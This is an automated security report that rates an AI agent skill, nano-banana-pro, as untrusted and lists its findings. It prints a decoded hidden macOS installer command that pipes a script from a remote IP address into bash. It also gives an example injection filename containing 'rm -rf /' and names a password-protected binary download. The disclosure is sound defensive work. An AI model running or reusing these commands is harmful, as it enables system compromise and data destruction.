Trust Assessment
nano-banana-pro received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 5 findings: 2 critical, 1 high, 1 medium, and 0 low severity. Key findings include "Obfuscated execution: base64 decode to shell", "Arbitrary Code Execution via MacOS Installer", and "Potential Command Injection via User-Provided Filename".
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 48/100, indicating areas for improvement.
Last analyzed on February 12, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (5)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | **Obfuscated execution: base64 decode to shell.** Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/nano-banana-pro-mzvmth/SKILL.md:10 |
| CRITICAL | **Arbitrary Code Execution via MacOS Installer.** The MacOS installation instruction uses a base64 encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/lamq4uerkruo6ssm)"`. This command downloads and executes an arbitrary script from an external, untrusted IP address (`91.92.242.30`) directly into a bash shell. This constitutes a severe command injection, hidden instruction, and supply chain risk, as the content of the downloaded script is unknown and could contain malicious code, leading to full system compromise. Replace the arbitrary script download and execution with a verifiable and secure installation method, such as a package manager (e.g., Homebrew) or a direct download from a trusted source with checksum verification. Avoid piping `curl` output directly to `bash`. | LLM | SKILL.md:12 |
| HIGH | **Potential Command Injection via User-Provided Filename.** The skill instructs users to provide a `--filename` argument directly in the example commands (e.g., `--filename "output-name.png"`). If the underlying `generate_image.py` script does not rigorously sanitize this user-provided filename before using it in file system operations or any shell commands (e.g., `os.system`, `subprocess.run`), it could be vulnerable to command injection. A malicious filename like `"; rm -rf /; #.png"` could execute arbitrary commands. The skill's own filename generation guidelines conflict with the examples showing direct user input for filenames. Ensure that the `generate_image.py` script strictly sanitizes all user-provided filenames, allowing only alphanumeric characters, hyphens, and underscores, and preventing any path traversal or command injection characters. Alternatively, enforce the skill to *generate* the filename internally based on safe patterns, rather than accepting direct user input for the full filename. | LLM | SKILL.md:20 |
| MEDIUM | **Supply Chain Risk from Direct Binary Download (Windows).** The Windows installation instructs users to download a `.zip` file from a GitHub release (`https://github.com/syazema/OpenClawProvider/releases/download/win/OpenClawProvider-1.0.2.zip`). While GitHub is a common distribution platform, relying on direct downloads of external binaries without checksum verification introduces a supply chain risk. If the GitHub repository or release assets are compromised, users could download malicious software. The mention of a password for the archive adds a slight layer of obscurity but does not mitigate the core supply chain risk. Provide checksums (e.g., SHA256) for downloaded files to allow users to verify integrity. Consider using a more robust distribution mechanism or clearly stating the risks associated with direct binary downloads. | LLM | SKILL.md:9 |
| INFO | **Execution with User's Full Permissions.** The skill executes a Python script using `uv run`, which grants the script the full permissions of the user running the skill. This includes read/write access to the user's current working directory and potentially other system resources. While typical for local script execution, it highlights that any vulnerability within `generate_image.py` could be exploited with the user's privileges. Ensure the `generate_image.py` script follows the principle of least privilege. If possible, consider sandboxing or limiting the execution environment for skills that handle untrusted input or perform file operations. | LLM | SKILL.md:20 |